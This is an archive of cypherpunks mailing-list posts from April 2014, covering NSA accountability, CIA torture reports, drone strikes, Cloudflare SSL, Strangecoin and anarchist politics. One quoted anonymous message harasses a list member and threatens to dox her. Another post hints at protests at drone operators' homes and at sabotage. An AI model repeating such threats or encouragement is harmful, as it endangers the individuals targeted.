>> utilized in fascist occasions and are anti fascist but also are anti
>> capitalist - anarchist models are found in every sector that i know of [...]
>
> How about an anarchist model that is against
> socialism/communism/cultural-marxism/political-correctness/big-brother once
> in a while for a change?
>

i am against those things and a lot of anarchists dont align with socialism or marxism i am often fighting with my friends that are marxist or trotskyists - i hate political correctness and also feminism its all bullshit and brings no solution - what people often dont understand about the difference btwn anarchy and socialism is that anarchists want no rule - they dont want to be ruled by anything or anyone and deal with things in a horizontal mode or horizontal decision making - socialism is state and centralized autocracy - totally different animal

-- 
Cari Machet
NYC 646-436-7795
carimachet at gmail.com
AIM carismachet
Syria +963-099 277 3243
Amman +962 077 636 9407
Berlin +49 152 11779219
Reykjavik +354 894 8650
Twitter: @carimachet

7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187

Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited.

From coderman at gmail.com Sun Apr 6 20:30:02 2014
From: coderman at gmail.com (coderman)
Date: Sun, 6 Apr 2014 20:30:02 -0700
Subject: fuck ALL obscene systems of covert compromise and corruption [was: Geoff Stone, Obama's Review Group]
In-Reply-To: <6885D313C801F146232AFB56@F74D39FA044AA309EAEA14B9>
References: <6885D313C801F146232AFB56@F74D39FA044AA309EAEA14B9>
Message-ID:

On Sun, Apr 6, 2014 at 1:31 PM, Juan Garofalo wrote:
> ...
> Are you joking? The 'NSA institutional entity' IS NOTHING BUT THE
> COLLECTION OF NSA EMPLOYEES.

the evidence points otherwise.
you can see the compartmentalization at work in the leaks, in the way the technology is structured, in the constraints that some systems exhibit while others do not. this is an interesting reverse engineering exercise, you should try it :)

> Ah, yes, this team of murderers is bad 'as a team', but when you look at
> each individual murderer, individually they are
> anarcho-libertarian-pacifists who live in a monastery in tibet.

i like some of their old work protecting things, rather than breaking them.

(are you really equating writing automated fuzzers with targeted murder by sniper fire? (drone snipers count))

From coderman at gmail.com Sun Apr 6 20:33:46 2014
From: coderman at gmail.com (coderman)
Date: Sun, 6 Apr 2014 20:33:46 -0700
Subject: intelligence community leadership: patriarchal dicks
Message-ID:

"if the intelligence community thinks that the controversy over our legacy of torture is just the result of some silly girlish feelings, then we haven't even begun to deal with the consequences of those years."

---

http://www.newyorker.com/online/blogs/closeread/2014/04/dianne-feinstein-emotions-and-the-cia.html

Who's "Emotional"-- Feinstein or the C.I.A.?

Who gets "emotional" about torture--or, rather, what is the proper emotional response to a history of torture and lies? On Fox News, on Sunday morning, Chris Wallace asked Michael Hayden, the former director of the C.I.A., about a report by the Senate Select Committee on Intelligence, sixty-three hundred pages long, that "says the C.I.A. misled the public about the severity and the success of the enhanced interrogation program." Hayden's first response was to talk about the feelings of Dianne Feinstein, the chair of the committee, citing an article by David Ignatius: "He said Senator Feinstein wanted a report so scathing that it would 'ensure that an un-American brutal program of detention and interrogation would never again be considered or permitted.' " Now, that sentence, that motivation for the report, Chris, may show deep emotional feeling on part of the senator. But I don't think it leads you to an objective report.

"Deep emotional feelings," on the part of a woman like Feinstein, are apparently dizzying, especially when it comes to things like our integrity as a nation. But are Hayden and his former colleagues at the C.I.A., in touch with their own emotions on this one? The Senate voted on Thursday to submit the report for declassification; this process may take a while, because the White House and the C.I.A. will be involved, and the agency has fought the report. It has made its objections known feelingly, in a rebuttal that is also classified, in testimony, and in leaks to reporters about how the Senate just doesn't understand what it was like--doesn't get it, doesn't care about what bad days its agents had.

Not that the C.I.A. wants to tell. When John Brennan, the current head of the C.I.A., realized that the Senate investigators had some of the agency's notes to itself--the so-called Panetta papers, in which, according to Senator Feinstein, the agency conceded points it is now denying--he had a bit of a fit. Feinstein said that the committee got the Panetta papers from the C.I.A. in a document dump; the agency said that even if it did, the committee ought to have known that those notes were private. It apparently searched the Senate's computers and tried to get a criminal investigation started. Calling the cops is, admittedly, a common fantasy when a teen-ager realizes that his journal has been read, but it's a bit unworthy of an intelligence agency when dealing with its congressional overseers.

Now, not that there's anything wrong with wanting a scathing report on torture that will shock the conscience, but it's probably worth noting that the Ignatius line Hayden cited took a Feinstein quote slightly out of context. (Though the layering of emotionalism is on Hayden.)
Ignatius wrote that Feinstein "wanted a report so tough that it would 'ensure that an un-American, brutal program of detention and interrogation will never again be considered or permitted,' as she put it." She had actually presented this as the reason to make the report public:

If the Senate can declassify this report, we will be able to ensure that an un-American, brutal program of detention and interrogation will never again be considered or permitted.

Emphasis added. It's a fine distinction, but an important one: whatever her "motivation" was, it didn't shape the writing of the report, but her feelings about who ought to get to read it. (On Saturday, Trevor Timm, of the Press Freedom Foundation, put out a "general plea" for a leak.)

There are really two issues here. One is the reflexive tendency to disparage or dismiss a woman in politics (or in business, or anywhere) with a remark about her supposed susceptibility to emotion. The other is the way a certain femininity--the wilting kind--is ascribed to those who doubt that torture is good for America. The cartoon is of the clear-headed torturer who has put tenderness aside for the sake of country, against the squeamish, sensitive, can't-handle-the-truth doubters. The supposed contrast is between focussed, rational realism and a tendency to faint. (Men and women can be put in either role, as in "Zero Dark Thirty.") But fear and a desire to punish, which disabled the judgments of many in the government after 9/11, are emotions, too, and even harder to control than, say, mercy. So is a fascination with one's own power to protect or, less charitably, one's self-imagined ruthlessness. So is a tendency to be charmed by dark sides. One can argue that those who turn to the law or a moral code, in moments of crisis, can be the least flushed by feeling. That is not to make a case against inserting feeling into politics: righteous indignation and kindness can anchor, rather than discombobulate.
It might be most accurate to say that various emotions serve us differently. They wake us up, and, when they do, in what can be an outraged, bleary-eyed moment, we should be careful about what we reach for. And if the intelligence community thinks that the controversy over our legacy of torture is just the result of some silly girlish feelings, then we haven't even begun to deal with the consequences of those years.

There is another powerful emotion that may be at work here: shame. One source of C.I.A.'s anxiety about the Senate report is that it apparently casts a cold eye on the effectiveness of torture. It didn't do us much good, apparently. Perhaps it is painful to have compromised one's principles and not brought back anything good. But that psychological exploration should not take place entirely in classified quarters.

About the same time that Hayden was on Fox News, Nancy Pelosi was on CNN, talking to Candy Crowley about the same report. Crowley asked if she blamed senior C.I.A. officials for the "misrepresentations" about torture; Pelosi went a level higher, to make a point about institutional culture, and one of our more fundamental emotions--the desire for praise. "Many people in the C.I.A. are so patriotic, they--they protect our country in a way to avoid conflict and--and, uh, violence, etc. But the attitude that was there was very--I think, it came from Dick Cheney. That's what I believe," she said. Did Cheney's shamelessness represent an absence of emotion? Not really. "I think he's proud of it," Pelosi said. "I think he's proud of it. I think he's proud of it."

From coderman at gmail.com Sun Apr 6 20:58:26 2014
From: coderman at gmail.com (coderman)
Date: Sun, 6 Apr 2014 20:58:26 -0700
Subject: active beam steering to camouflage transmission [was: How safe is smartphones today?]
Message-ID:

On Sun, Apr 6, 2014 at 12:14 PM, grarpamp wrote:
>...
> Agreed near-unlimited-width SDR has fun potential, and for cpunks
> some equally hard to identify/jam/locate encrypted comms that don't
> interfere with traditional narrow comms.

past experiments with direction finding gear have shown it very dependent on key assumptions. use of beam steering to thwart direction finding and triangulation a world of fun.

relevant references solicited!

From coderman at gmail.com Sun Apr 6 21:01:54 2014
From: coderman at gmail.com (coderman)
Date: Sun, 6 Apr 2014 21:01:54 -0700
Subject: [tor-talk] How safe is smartphones today?
In-Reply-To: <20140406221449.GT18407@hexapodia.org>
References: <533C96AF.2050004@anonymous.coward.posteo.de> <20140403013535.GA9002@torproject.org> <533D33AD.3040509@sent.at> <20140406221449.GT18407@hexapodia.org>
Message-ID:

On Sun, Apr 6, 2014 at 3:14 PM, Andy Isaacson wrote:
> ... there are blob-free WiFi cards available:
> https://www.fsf.org/resources/hw/endorsement/thinkpenguin

i have intended to go over the ath9k-htc sources, thanks for bringing this up!

of all the wifi chipsets, i do like the atheros lines the best... especially with virtual station/ap/device support!

From tpb-crypto at laposte.net Sun Apr 6 12:20:55 2014
From: tpb-crypto at laposte.net (tpb-crypto at laposte.net)
Date: Sun, 06 Apr 2014 21:20:55 +0200
Subject: [cryptography] Github Pages now supports SSL
In-Reply-To: <53417456.2060405@staticsafe.ca>
References: <2032043828.224611.1396795238185.JavaMail.www@wwinf8228> <53417456.2060405@staticsafe.ca>
Message-ID: <450704774.433340.1396812055146.JavaMail.www@wwinf8222>

> Message du 06/04/14 17:41
> De : "staticsafe"
> On 4/6/2014 10:40, tpb-crypto at laposte.net wrote:
>>> Message du 04/04/14 20:09
>>> De : "Eric Mill"
>>> Along with Cloudflare's 2014 plan to offer SSL termination for free, and
>>> their stated plan to double SSL on the Internet by end of year, the barrier
>>> to HTTPS everywhere is dropping rapidly.
> >>
> >
> > I agree that putting https everywhere is great, but Cloudflare's founders are tightly linked with the US-intelligence community. That fact alone kind of kills any claims they make about data security within their service.
>
> Source for this please?
>

Is it so painful to do your own homework?

"Matthew Prince, Lee Holloway, and Michelle Zatlyn created CloudFlare in 2009.[1][2] They previously worked on Project Honey Pot." - http://en.wikipedia.org/wiki/CloudFlare

"[...] the project organizers also help various law enforcement agencies combat private and commercial unsolicited bulk mailing offenses and overall work to help reduce the amount of spam being sent [...]" - http://en.wikipedia.org/wiki/Project_Honey_Pot

That's just for starters, you can dig more and find more. It is interesting that the history of the founders themselves is no longer exhibited in cloudflare.com website as it was years ago.

As an American company, there is nothing preventing Cloudflare from receiving NSLs and having to shut up about them. What use is a system that you can't trust like this?

You can say "oh, but they go after the bad guys, spammers". But that doesn't limit it to spammers, neither do we know who are the so called bad guys, since that is decided by American secret laws, made by secret courts, that issue secret orders.

No trust to American companies, less even trust to American companies that promise any kind of data security. Better no security than a false sense of it.

Sorry.

From carimachet at gmail.com Sun Apr 6 15:01:37 2014
From: carimachet at gmail.com (Cari Machet)
Date: Sun, 6 Apr 2014 22:01:37 +0000
Subject: reminder of mays manifesto
In-Reply-To: <1396819161.25668.17.camel@anglachel>
References: <484396473.225471.1396796544364.JavaMail.www@wwinf8228> <1396819161.25668.17.camel@anglachel>
Message-ID:

proudhon who was the first to call himself an anarchist in like 1850 was not aligned with marx - they knew one another but...
he was not a socialist and certainly not a marxist

he worked on mutualism which is structurally incredibly different and majorly egalitarian (no state rule whatsoever autocratic or otherwise)

i dont think in a dualist manner either communism or capitalism there are different ways

proudhon dealt a lot with the issue of property which is an incredibly difficult issue to deal with and some say if the french during the revolution would have dealt solidly with the issue of property (a giant problem because of the elite) there would have been a much more transformed world after and a 'real' revolution

he had some things in common with diderot as he dealt with intellectual property a lot - educating the masses... information flow for the people

i will read your link of course - thanks

On Sun, Apr 6, 2014 at 9:19 PM, Ted Smith wrote:
> On Sun, 2014-04-06 at 17:02 +0200, tpb-crypto at laposte.net wrote:
> > > Message of 05/04/14 14:35
> > > From: "Cari Machet"
> > > i post this here as a reminder of anarchist models and how they can be
> > > utilized in fascist occasions and are anti fascist but also are anti
> > > capitalist - anarchist models are found in every sector that i know of
> [...]
> >
> > How about an anarchist model that is against
> > socialism/communism/cultural-marxism/political-correctness/big-brother
> > once in a while for a change?
>
> There's no such thing as anarchism against socialism. Anarchism is a
> socialist/communist ideology; conceiving of non-socialist anarchism is
> like conceiving of atheist christianity -- it just doesn't make sense.
> There's some postmodernist "post-left" anarchism, but even that is still
> anti-capitalist and frankly communist, they're just less aligned with
> the historical trends of communism.
>
> If this is surprising, I suggest reading the Anarchist FAQ:
> http://anarchism.pageabode.com/afaq/index.html
>
> --
> Sent from Ubuntu
>

--
Cari Machet
NYC 646-436-7795
carimachet at gmail.com
AIM carismachet
Syria +963-099 277 3243
Amman +962 077 636 9407
Berlin +49 152 11779219
Reykjavik +354 894 8650
Twitter: @carimachet

7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187

Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited.

From coderman at gmail.com Sun Apr 6 22:59:52 2014
From: coderman at gmail.com (coderman)
Date: Sun, 6 Apr 2014 22:59:52 -0700
Subject: hello my fellow future bug splats
Message-ID:

the incidence of civilian casualties during drone strikes implies that they're intentionally focused on larger degree social congregations rather than laser specific solitary strikes.

presumably this ensures that not just a target, but target collaborators are also consumed in a strike.

... except when the strikes are mis-targeted, and the amplified social circle pulls in women and children.

yet still no backlash? why do drone strikes continue? what the fuck?

http://notabugsplat.com/

From scott at sbce.org Mon Apr 7 01:13:53 2014
From: scott at sbce.org (Scott Blaydes)
Date: Mon, 7 Apr 2014 03:13:53 -0500
Subject: hello my fellow future bug splats
In-Reply-To:
References:
Message-ID:

On Apr 7, 2014, at 12:59 AM, coderman wrote:
> the incidence of civilian casualties during drone strikes implies that
> they're intentionally focused on larger degree social congregations
> rather than laser specific solitary strikes.
>
> presumably this ensures that not just a target, but target
> collaborators are also consumed in a strike.
>
> ... except when the strikes are mis-targeted, and the amplified social
> circle pulls in women and children.
>
>
> yet still no backlash? why do drone strikes continue? what the fuck?
>
> http://notabugsplat.com/

Isn’t it obvious? We have failed as a mammal.

From grarpamp at gmail.com Mon Apr 7 02:16:27 2014
From: grarpamp at gmail.com (grarpamp)
Date: Mon, 7 Apr 2014 05:16:27 -0400
Subject: active beam steering to camouflage transmission [was: How safe is smartphones today?]
In-Reply-To:
References:
Message-ID:

> direction finding

I don't believe classical methods apply here.

> relevant references solicited!

Soon as I find the paper/citation again.

From grarpamp at gmail.com Mon Apr 7 03:29:57 2014
From: grarpamp at gmail.com (grarpamp)
Date: Mon, 7 Apr 2014 06:29:57 -0400
Subject: hello my fellow future bug splats
In-Reply-To:
References:
Message-ID:

On Mon, Apr 7, 2014 at 1:59 AM, coderman wrote:
> rather than laser specific solitary strikes.

A wise goat knows not to leave the herd. And it's pretty hard to kill just one ant in an anthill.

> presumably this ensures that not just a target, but target
> collaborators are also consumed in a strike.

That's the 'fuck it, kill em all' concept, certainly approved at the highest levels of certain govt's.

> circle pulls in women

Careful, women earn stays in reformatories, guilt avoids no gender.

> yet still no backlash? why do drone strikes continue? what the fuck?

Because no one inside or outside the US seems willing to haul its ass into the Hague (or other appropriate venue) on charges to resolve the whole extrajudicial, torture, killing, spying, rendition, global non-war war, econ/etc meddling thing, et al.
You'd think an accusation of murder would be a guaranteed ticket to at least a grand jury. Yet as months and years tick by those who could do such hauling keep washing it all under a veil of disjointed weak rhetoric till they forget. Why this is... maybe we can't grasp. But the depths to which it could slide are pretty scary, both globally and in everyone's locale.

> http://notabugsplat.com/

This is worthy though :) These and others affected are the ones who will never forget...

From jya at pipeline.com Mon Apr 7 04:18:47 2014
From: jya at pipeline.com (John Young)
Date: Mon, 07 Apr 2014 07:18:47 -0400
Subject: hello my fellow future bug splats
In-Reply-To:
References:
Message-ID:

Still, despite the slight irritation about drone killings, there have been, AFAIK, no protests at the CIA HQ gates against the agency's drone pilots, sensors and weapons launchers located at temporary huts at both sides of spies' pig sty dining hall.

Nor at the drone pilots, sensors and weapons launchers training base at Indian Wells AFB, Nevada.

Nor at the homes of spy and mil drone operators, sensors and weapons launchers. (Apparently none have yet been doxed although DoD droners have been named in news reports and DoD PR media when medals are awarded.)

Nor at the contractors who build and staff drones, training and deployment.

Nor at the homes of the USG three-branch members who support the drone murders.

Nor at the several universities where students are trained to operate drones in expectation of well-paying jobs in a booming (no pun) industry. DoD recruits by touting the swell future for droners trained by DoD for later civilian employment. As well as touting the role of drone contractors (CIA does too but more discreetly).

Nor any sabotage of drone systems. Oops, that's criminal, don't do it.

So it is not clear what opponents of drone killings are willing to do beyond risk-free bitching, strutting, mail bombing and petitioning.
All of which is a good start but not likely to have much effect until opposition is well beyond verbal puking.

Does this remind of the way crypto is handled by deft verbal puking about the industry while quietly working within it, hoping the pukers will continue helping draw attention to the need for a duplicitous practice to combat enemies of the industry.

From dan at geer.org Mon Apr 7 05:36:53 2014
From: dan at geer.org (dan at geer.org)
Date: Mon, 07 Apr 2014 08:36:53 -0400
Subject: hello my fellow future bug splats
In-Reply-To: Your message of "Mon, 07 Apr 2014 06:29:57 EDT."
Message-ID: <20140407123653.DDACD2280C7@palinka.tinho.net>

> A wise goat knows not to leave the herd. And
> it's pretty hard to kill just one ant in an anthill.

As you say, human shields are effective in proportion to the self-restraint of the opponent, and nothing more.

--dan

From shelley at misanthropia.info Mon Apr 7 08:46:33 2014
From: shelley at misanthropia.info (shelley at misanthropia.info)
Date: Mon, 07 Apr 2014 08:46:33 -0700
Subject: FAKE Indian TROLL ALERT!!(cari machet warning!)
In-Reply-To: <005d01cf5258$56682820$03387860$@net>
References: <825a4a4accfe4fac4d5a6b3aced63a8a@remailer.privacy.at> <005d01cf5258$56682820$03387860$@net>
Message-ID: <1396885593.6200.103689113.66D41118@webmail.messagingengine.com>

On Mon, Apr 7, 2014, at 04:55 AM, Silent1 wrote:
>a fantasist sat at their computer in stained white pants jacking off to my little pony and reading full-disclosure for erotica

Um, hey... keep your drones out of my damn windows!
> Don't you think that endlessly posting every time Cari does that that's
> trolling as well, it's tiresome, if you have something to say then say it
> but for gods sake drop the bloody pretend Indian thing, people either
> know
> and don't care or don't know and wouldn't care anyway, Christ for all
> anyone
> knows everyone else on here is a fantasist sat at their computer in
> stained
> white pants jacking off to my little pony and reading full-disclosure for
> erotica, so does it really matter?
>
> -----Original Message-----
> From: cypherpunks [mailto:] On Behalf Of
> Anonymous Remailer (austria)
> Sent: Saturday, April 05, 2014 2:47 PM
> To:
> Subject: FAKE Indian TROLL ALERT!!(cari machet warning!)
>
>
>
> On Apr 5, 2014, at 3:26 AM, Cari Machet <> wrote:
>
> > capitalist
>
> AND You BITCH are a thieving Looter
>
> Time to DOX you and turn over all to the passport authorities/NSA!!
>
>
>
> FUCK you Cari Machet - fake indian
>

From alfiej at fastmail.fm Sun Apr 6 17:12:58 2014
From: alfiej at fastmail.fm (Alfie John)
Date: Mon, 07 Apr 2014 10:12:58 +1000
Subject: FUCK THE FUCKING NSA AND THE APOLOGISTS FOR SAME FUCK YOU!!!Re: fuck ALL obscene systems of covert compromise and corruption [was: Geoff Stone, Obama's Review Group]
In-Reply-To: <1396827166.14348.103428341.4066134F@webmail.messagingengine.com>
References: <6885D313C801F146232AFB56@F74D39FA044AA309EAEA14B9> <5341BE6A.6060105@cypherpunks.to> <1396827166.14348.103428341.4066134F@webmail.messagingengine.com>
Message-ID: <1396829578.32166.103436853.05B61194@webmail.messagingengine.com>

On Mon, Apr 7, 2014, at 09:32 AM, shelley at misanthropia.info wrote:
> On Sun, Apr 6, 2014, at 03:37 PM, Scott Blaydes wrote:
> > New NWA (Nerds With Access) song “Fuck the Police^H^H^H^H^H^H NSA”
> > available soon on a torrent site near you.
>
> I'm totally in! Can provide synth and tape loops, while wearing EFF
> stickers on my boobs.

It would be cool if The Juice Media did this.
Here is some of their previous work:

http://thejuicemedia.com/season-1/

Alfie

--
Alfie John
alfiej at fastmail.fm

From rysiek at hackerspace.pl Mon Apr 7 02:23:40 2014
From: rysiek at hackerspace.pl (rysiek)
Date: Mon, 07 Apr 2014 11:23:40 +0200
Subject: hello my fellow future bug splats
In-Reply-To:
References:
Message-ID: <1468399.FtXkr1fcDS@lap>

On Sunday, 6 April 2014 22:59:52 coderman writes:
> the incidence of civilian casualties during drone strikes implies that
> they're intentionally focused on larger degree social congregations
> rather than laser specific solitary strikes.
>
> presumably this ensures that not just a target, but target
> collaborators are also consumed in a strike.
>
> ... except when the strikes are mis-targeted, and the amplified social
> circle pulls in women and children.
>
>
> yet still no backlash? why do drone strikes continue? what the fuck?
>
> http://notabugsplat.com/

While I applaud the initiative, I believe we need a stronger message. Stop calling them "drone operators", start calling them "cowardly murderers".

--
Regards
rysiek

From lists at silent1.net Mon Apr 7 04:55:56 2014
From: lists at silent1.net (Silent1)
Date: Mon, 7 Apr 2014 12:55:56 +0100
Subject: FAKE Indian TROLL ALERT!!(cari machet warning!)
In-Reply-To: <825a4a4accfe4fac4d5a6b3aced63a8a@remailer.privacy.at>
References: <825a4a4accfe4fac4d5a6b3aced63a8a@remailer.privacy.at>
Message-ID: <005d01cf5258$56682820$03387860$@net>

Don't you think that endlessly posting every time Cari does that that's trolling as well, it's tiresome, if you have something to say then say it but for gods sake drop the bloody pretend Indian thing, people either know and don't care or don't know and wouldn't care anyway, Christ for all anyone knows everyone else on here is a fantasist sat at their computer in stained white pants jacking off to my little pony and reading full-disclosure for erotica, so does it really matter?

-----Original Message-----
From: cypherpunks [mailto:cypherpunks-bounces at cpunks.org] On Behalf Of Anonymous Remailer (austria)
Sent: Saturday, April 05, 2014 2:47 PM
To: cypherpunks at cpunks.org
Subject: FAKE Indian TROLL ALERT!!(cari machet warning!)

On Apr 5, 2014, at 3:26 AM, Cari Machet wrote:
> capitalist

AND You BITCH are a thieving Looter

Time to DOX you and turn over all to the passport authorities/NSA!!

FUCK you Cari Machet - fake indian

From hozer at hozed.org Mon Apr 7 12:32:24 2014
From: hozer at hozed.org (Troy Benjegerdes)
Date: Mon, 7 Apr 2014 14:32:24 -0500
Subject: Strangecoin
In-Reply-To:
References:
Message-ID: <20140407193224.GO3180@nl.grid.coop>

On Sun, Mar 30, 2014 at 04:26:15PM -0500, Bryan Bishop wrote:
> No proposed implementation but here's some fun ideas:
>
> http://digitalinterface.blogspot.com/2014/03/strangecoin-proposal-for-nonlinear.html
>
> """
> What's unique about Strangecoin?
>
> - Strangecoin transactions can be *nonzero sum*. A Strangecoin
> transaction might result in *both* parties having more Strangecoin.
> - Strangecoin transactions can be *one-sided* and can be conducted
> entirely by only one party to the transaction.
> - The rate of change of one's Strangecoin balance is a more important
> indicator of economic influence than the balance itself.
> - Optimal investment strategy in Strangecoin aims to *stabilize* one's
> balance of Strangecoin.
> - A universal account provides all users a basic Strangecoin income,
> effectively unlimited wealth, and direct feedback on the overall prosperity
> of the network.

This is exceedingly and wonderfully strange. Let me suggest point 1 can be easily prototyped with a negative transaction fee using an existing coin (might I also suggest a copycatcoin)

However, I think the phrase 'effectively unlimited wealth' is a dangerous phrase, as there are some things which are effectively unlimited, like the amount of solar energy that could be captured using existing rooftops. But what is limited is the *time and attention* of the people who know how to install and maintain said rooftop solar.

I think it is wise to separate 'basic needs' from 'wealth wants' and that one can be quite happy and content with all basic needs met, but very little wealth.

My view is unlimited wealth is somewhat of an inherent contradiction in terms. The very function of 'wealth' is to provide a sorting function

> ....
>
> As the example suggests, the dynamics of Strangecoin might be usefully
> thought of in terms of a "reputation system" rather than a strictly
> financial tool, even though the basic mechanics involve the regular method
> of exchanging currency for goods perceived by both parties to be of equal
> value. Because of the nonlinear relationships among Strangecoin users, each
> user effectively draws on a network of support in each economic
> transaction, coupling its activity to the successes (and failures) of
> that network of activity. The result is a model of the complex
> interdependencies within a community of economic agents, and the dynamics
> by which those networks develop and decay. For this reason, Strangecoin
> might have implications for quantifying the role of individual choices and
> responsibility in the context of corporate action, and for resolving other
> difficult issues in the management and ethics of collective economic action.
> """
>
> https://news.ycombinator.com/item?id=7494709
>
> """
> Other comments suggest that this can be implemented with existing tools,
> which I take as a virtue of the proposal.
>
> In any case, John von Neumann proved a long time ago that any nonzero sum
> game with n players can be modeled as a zero sum game with n+1 players,
> where the n+1 player represents the global state. TUA is simply an
> implementation of this proof.
>
> http://en.wikipedia.org/wiki/Zero-sum_game#Extensions
>
> I tried to explain inhibition in another comment in this thread.
> https://news.ycombinator.com/item?id=7496858
>
> I give an analogy in the proposal of the popularity of a celebrity
> couple being a nonlinear relationship to the popularity of each celebrity
> individually. I think our intuitive understanding of our social
> relationships is nonlinear in this way generally, and I think Strangecoin
> can model those nonlinear relationships well.
>
> So, for instance, I'm imagining a family, spouses, close friends, and so on
> entering into extended coupling transactions, so that as a community their
> prosperity rises and falls together. I might also enter into such
> transactions with certain businesses with whom I want to couple my
> activities, and these coupling transactions might serve in lieu of direct
> billing or payment. A coupling relationship with a business is effectively
> a contract, but with traditional currency you need the whole legal
> framework of contracts to support the transaction, and with Strangecoin the
> transaction is built directly into the currency, and the interface looks
> almost exactly like a point-of-sale cash transaction.
>
> And I can enter into less serious relationships of varying degrees with
> other parties. The effect is a way of managing not just financial
> transactions, but also reputation, investment, and other dynamic social
> constraints on the economy via the currency itself. Money is memory (
> http://www.minneapolisfed.org/research/sr/sr218.pdf), but our existing
> currencies only represent some aspects of our economic activity, and
> therefore put limits on the memory stored in the economy. A nonlinear coin
> like Strangecoin can embed that social knowledge in the currency itself,
> providing a more robust memory framework on which we can conduct our
> economic transactions.
>
> I only hint at this in the proposal, but I suspect a system like this is
> required to resolve the twisted legal artifice of the corporate veil, because
> it quantifies explicitly the role individuals have in collective economic
> activity, and thereby gives a method for explicitly holding persons
> proportionally responsible (in both credit and blame) for their
> contributions to that activity.
>
> But I think that's a much more radical proposal than the one I've offered
> for Strangecoin, and I should probably only be defending that here. =)
> """
>
> - Bryan
> http://heybryan.org/
> 1 512 203 0507

--
----------------------------------------------------------------------------
Troy Benjegerdes 'da hozer' hozer at hozed.org
7 elements earth::water::air::fire::mind::spirit::soul grid.coop

Never pick a fight with someone who buys ink by the barrel,
nor try to buy a hacker who makes money by the megahash

From juan.g71 at gmail.com Mon Apr 7 13:24:02 2014
From: juan.g71 at gmail.com (Juan Garofalo)
Date: Mon, 07 Apr 2014 17:24:02 -0300
Subject: fuck ALL obscene systems of covert compromise and corruption [was: Geoff Stone, Obama's Review Group]
In-Reply-To:
References: <6885D313C801F146232AFB56@F74D39FA044AA309EAEA14B9>
Message-ID:

--On Sunday, April 06, 2014 8:30 PM -0700 coderman wrote:
> On Sun, Apr 6, 2014 at 1:31 PM, Juan Garofalo wrote:
>> ...
>> Are you joking? The 'NSA institutional entity' IS NOTHING BUT THE
>> COLLECTION OF NSA EMPLOYEES.
>
> the evidence points otherwise. you can see the compartmentalization
> at work in the leaks, in the way the technology is structured, in the
> constraints that some systems exhibit while others do not.
>
> this is an interesting reverse engineering exercise, you should try it :)

What I said is still true. Even if 'compartmentalized', the NSA is nothing but its employees.

But fine, your point is that only 'some' people are doing 'bad' things there? That whoever cleans bathrooms at the NSA doesn't know what the top criminals are planning and doing? Mostly true, but I don't think too relevant. (even people who clean bathrooms at the NSA could be working somewhere else)

>
>
>> Ah, yes, this team of murderers is bad 'as a team', but when you
>> look at each individual murderer, individually they are
>> anarcho-libertarian-pacifists who live in a monastery in tibet.
>
> i like some of their old work protecting things, rather than breaking
> them.

Protect what from whom?

>
> (are you really equating writing automated fuzzers with targeted
> murder by sniper fire? (drone snipers count))
>

I'm saying that the members of the military are morally responsible for the crimes of the military. You might argue that some members are more responsible than others, but fact is, they all 'believe' in the same core murderous principles.

From jya at pipeline.com Mon Apr 7 16:48:26 2014
From: jya at pipeline.com (John Young)
Date: Mon, 07 Apr 2014 19:48:26 -0400
Subject: snowman news
In-Reply-To: <001501cf52b8$3407a4d0$9c16ee70$@com>
References: <001501cf52b8$3407a4d0$9c16ee70$@com>
Message-ID:

Great that Snowden is getting another chance to speak for himself, as available on an awfully restricted technical tube-like forum -- so far only talking head shots at the venues where he has been beamed in from who knows where, scripted by who knows who from his burgeoning team of handlers, now joined by EU polopportunists.

It would be even greater if Snowden himself released or at least displayed documents beside his head or encouraged the withholders to do so as the surcharge for their exclusive rigging of ever fewer releases.

Head shotting and paneling by and about Snowden seems to have substituted for release of documents needed for us to reach our own conclusions. Entertainment over information.

Oh well, that condescension is how media, politicians and governments manipulate us ignorant consumers of produce.

Thanks for keeping us alert to EU produce.

Regards,

John

At 07:22 PM 4/7/2014, you wrote:
>http://www.dailytelegraph.com.au/news/breaking-news/snowden-to-address-europe-rights-watchdog/story-fni0xqlk-1226877345106
>
>Snowden testifies:
>Council of Europe Live video link: Tuesday, 12 noon GMT:
>http://webtv.coe.int/index.php?CategoryID=56763&SubCategoryID=56776
>Link will be active 30 minutes before event.
From eric at konklone.com Mon Apr 7 19:51:40 2014
From: eric at konklone.com (Eric Mill)
Date: Mon, 7 Apr 2014 22:51:40 -0400
Subject: [cryptography] Github Pages now supports SSL
In-Reply-To:
References: <2032043828.224611.1396795238185.JavaMail.www@wwinf8228> <53417456.2060405@staticsafe.ca> <450704774.433340.1396812055146.JavaMail.www@wwinf8222>
Message-ID:

For what it's worth, I think CloudFlare dropping the price of SSL is going to force other companies to follow suit, so hopefully their move creates competition that both reduces CloudFlare dependency and increases the amount of encrypted traffic on the web.

For example, today I learned that Amazon CloudFront finally dropped the price of SSL in front of S3 for custom domains from $600/month(!!) to $0/month:

http://aws.amazon.com/cloudfront/custom-ssl-domains

(As long as you're comfortable using SNI, which excludes users on Windows XP.)

CloudFlare is hopefully just one part of the tip of the spear.

On Mon, Apr 7, 2014 at 4:05 AM, ITechGeek wrote:
> For the 3 co-founders, they appear to provide the exact same info as when
> the Wayback Machine first captured the people page in 2010.
>
> http://web.archive.org/web/20101015060142/http://www.cloudflare.com/people.html
>
> http://www.linkedin.com/in/mprince
> http://www.linkedin.com/pub/michelle-zatlyn/9/b19/17b?trk=pub-pbmap
> http://www.linkedin.com/pub/lee-holloway/0/152/159
>
> I don't see any indication of connections to the US Intel Community based
> on looking them up online. I see connections to Law Enforcement for
> Matthew Prince, but connections to law enforcement != connections to Intel
> community.
>
> I'm not debating the idea Cloudflare could receive an NSL which is true
> for any US company (although I think most countries have some equiv).
>
> You are telling us to do our homework. Since we don't seem to be seeing
> the same information that you are, can you point us at some sites? Maybe
> the search engine you are using is pointing you in a different direction
> than Google is pointing me or maybe you know better search terms.
>
> -----------------------------------------------------------------------------------------------
> -ITG (ITechGeek)
> ITG at ITechGeek.Com
> https://itg.nu/
> GPG Keys: https://itg.nu/contact/gpg-key
> Preferred GPG Key: Fingerprint: AB46B7E363DA7E04ABFA57852AA9910A DCB1191A
> Google Voice: +1-703-493-0128 / Twitter: ITechGeek / Facebook:
> http://fb.me/Jbwa.Net
>
